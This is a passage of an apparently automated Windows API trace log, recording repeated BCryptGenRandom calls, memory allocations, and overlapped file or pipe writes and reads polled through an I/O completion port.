_Size=0x4) returned 0x1fa91d0 [0203.999] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.999] free (_Block=0x1fa91d0) [0203.999] free (_Block=0x1fa2ed8) [0203.999] free (_Block=0x1fa90b8) [0203.999] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.000] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.008] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x130, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.008] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.008] CloseHandle (hObject=0x2a8) returned 1 [0204.008] free (_Block=0x3df0008) [0204.008] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.014] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.015] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.015] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.015] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.015] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.015] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.015] free (_Block=0x3e305b8) [0204.015] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.015] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.016] free (_Block=0x1fa91d0) [0204.016] free (_Block=0x1fa2ed8) [0204.016] free (_Block=0x1fa90b8) [0204.016] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.016] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.016] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.016] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.024] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1c8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.024] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.024] CloseHandle (hObject=0x2a8) returned 1 [0204.024] free (_Block=0x3df0008) [0204.024] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.030] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.030] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.030] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.031] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.031] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.031] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.031] free (_Block=0x3e305b8) [0204.031] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.031] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.031] free (_Block=0x1fa91d0) [0204.031] free (_Block=0x1fa2ed8) [0204.031] free (_Block=0x1fa90b8) [0204.031] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.032] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.032] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.032] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.044] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.044] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.045] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.045] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.045] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.045] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.045] free (_Block=0x3e305b8) [0204.045] calloc (_Count=0x41, _Size=0x4) returned 0x1fa92e8 [0204.045] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.045] free (_Block=0x1fa92e8) [0204.045] free (_Block=0x1fa2ed8) [0204.045] free (_Block=0x1fa91d0) [0204.045] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0204.046] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.046] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0204.046] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.053] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x49, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0204.053] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.053] CloseHandle (hObject=0x3cc) returned 1 [0204.053] free (_Block=0x1ff1e60) [0204.053] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.059] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.059] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.059] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.059] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.060] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.060] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.060] free (_Block=0x3e305b8) [0204.060] calloc (_Count=0x41, _Size=0x4) returned 0x1fa92e8 [0204.060] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.060] free (_Block=0x1fa92e8) [0204.060] free (_Block=0x1fa2ed8) [0204.060] free (_Block=0x1fa91d0) [0204.060] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0204.060] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.061] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0204.061] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.069] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0204.069] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.069] CloseHandle (hObject=0x3cc) returned 1 [0204.071] free (_Block=0x1ff1e60) [0204.071] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.165] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.165] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.165] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.165] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.166] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.166] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.166] free (_Block=0x3e305b8) [0204.166] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.166] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.166] free (_Block=0x1fa91d0) [0204.166] free (_Block=0x1fa2ed8) [0204.166] free (_Block=0x1fa90b8) [0204.166] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0204.167] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.169] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.169] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.170] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.170] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.170] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.170] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.170] free (_Block=0x3e305b8) [0204.170] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.170] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.170] free (_Block=0x1fa91d0) [0204.171] free (_Block=0x1fa2ed8) [0204.171] free (_Block=0x1fa90b8) [0204.171] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.171] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.171] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.171] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.184] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x24f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.184] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.185] CloseHandle (hObject=0x3cc) returned 1 [0204.185] free (_Block=0x3df0008) [0204.185] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.192] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.192] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.192] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.192] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.193] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.193] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.193] free (_Block=0x3e305b8) [0204.193] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.193] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.193] free (_Block=0x1fa91d0) [0204.193] free (_Block=0x1fa2ed8) [0204.193] free (_Block=0x1fa90b8) [0204.193] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.193] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.194] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.194] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.203] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3d7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.203] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.203] CloseHandle (hObject=0x3cc) returned 1 [0204.203] free (_Block=0x3df0008) [0204.204] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.210] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.211] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.211] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.211] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.211] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.211] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.211] free (_Block=0x3e305b8) [0204.211] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.211] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.212] free (_Block=0x1fa91d0) [0204.212] free (_Block=0x1fa2ed8) [0204.212] free (_Block=0x1fa90b8) [0204.212] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.212] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.212] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.212] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.220] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x101, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.220] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.220] CloseHandle (hObject=0x3cc) returned 1 [0204.220] free (_Block=0x3df0008) [0204.220] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0204.227] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.228] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0204.228] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.228] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0204.229] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.229] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0204.229] free (_Block=0x3e305b8) [0204.229] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0204.229] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0204.229] free (_Block=0x1fa91d0) [0204.229] free (_Block=0x1fa2ed8) [0204.229] free (_Block=0x1fa90b8) [0204.229] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.230] GetQueuedCompletionStatus (in: CompletionPort=0x14c, 